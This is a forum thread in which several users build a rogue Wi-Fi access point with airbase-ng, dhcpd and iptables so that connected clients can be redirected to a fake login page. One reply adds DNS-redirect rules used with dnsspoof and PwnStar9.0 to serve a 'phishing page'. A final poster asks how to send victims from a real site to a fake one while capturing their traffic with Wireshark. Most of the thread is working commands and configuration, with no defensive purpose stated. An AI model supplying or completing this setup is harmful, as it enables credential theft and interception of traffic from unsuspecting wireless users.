Fake AP Redirect Issue.

[pike168]

I am tring to setup a fake AP using my WLAN which when connected to causes all browsers to redirect to my apache server, where a fake login page is setup.

I've been struggling for a few days trying to set this up. I've not got the the stage where i can successfully create a AP using airbase and then have other clients connect to it and be given an IP address, using dhcpd3-server, not the isc-dhcp-server.

on my machine there are two interfaces eth1 which is connected to my LAN and wlan0. i do not want any connected clients access to the internet via eth1, i only want redirection to the local apache httpd server.

Below is the contents of my dhcpd.conf file and the two scripts which setup the AP and then configure the machine to handle DHCP requests.
dhcpd.cong

Code:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}

The below scripts creates and AP:

Code:

airmon-ng check kill 
airmon-ng start wlan0 7
airbase-ng -e TESTER -a 6C:4C:A5:2F:6A:D1 -c 7 mon0

This script sets up the TAP interface,dhcpd, http and mysql daemons. The script executes fine and clients can connected and receive IP addresses but they will not redirect to my apache server.

Code:

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
touch /var/run/dhcpd.pid
chmod 777 /var/run/dhcpd.pid
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/dhcp3-server start
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
service mysql start
service apache2 start
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 000.000.00.000:80

Would anyone know what is causing the problem, I think its the IPTables commands.

Thanks for any feedback.

[mmusket33]

Do not think in anyway that we are masters of IP tables.

This is what we used to get PwnStar9.0 to express the index.html phishing page in the targets computer using simple dnsspoof and no internet access provided. We embedded this behind an if statement as required by the program selections in Pwnstar9.0

No internet access in provided therefore only one(1) wifi device is used
$API=the wifi device
This relys on dnsspoof
The phishing pages are stored in the /var/www/ folder
Set the permissions to allow the pages to read and write and act as a program
You can adjust to IP as you see fit to your program



iptables -t nat -A PREROUTING -s 192.168.0.100/24 -p udp --dport 53 -j DNAT --to-destination 127.0.0.1
iptables -t nat -A PREROUTING -s 192.168.0.100/24 -p tcp --dport 53 -j DNAT --to-destination 127.0.0.1
iptables --table nat --append POSTROUTING --out-interface $API -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT



You also might see how we implimented the techdynamics phishing approach into kali-linux using dnsmasq


Go here and download the program and look at the coding and help files. This approach uses mysql

http://forum.aircrack-ng.org/index.php/topic,315.0.html


If you find a solution we would be interested in seeing your work

We hope this gives you a direction toward a solution.
MTA

[yoku]

Hello community!
I need some help, I made a FakeAP, and now I need to redirect www.somesite.com to www.somefakesite.com for all connected client.


apt-get install dhcp3-server

dhcpd.conf

Code:

authoritative;
default-lease-time 600;
max-lease-time 7200;

subnet 192.168.1.0  netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;

option domain-name "WIFI";
option domain-name-servers 192.168.1.1;

range 192.168.1.2 192.168.1.40;
}

airmon-ng start wlan0
Kill all PID
airbase-ng -c 11 -e WIFI mon0

Code:

ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.65.2
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE


dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

OK, now I have a working fakeAP, I can connect and surf on the internet with connected wireless clients and can caputre all trafic with wireshark.

But what is the simplest way to redirect all connected client from www.somesite.com to www.somefakesite.com?
I tried a few tutorials, but can't make it to work. Can you please help me?
Maybe with proxy? I tried ettercap too, but as I know thats working just on lan and I need to add all clients manually to the list.

Thank you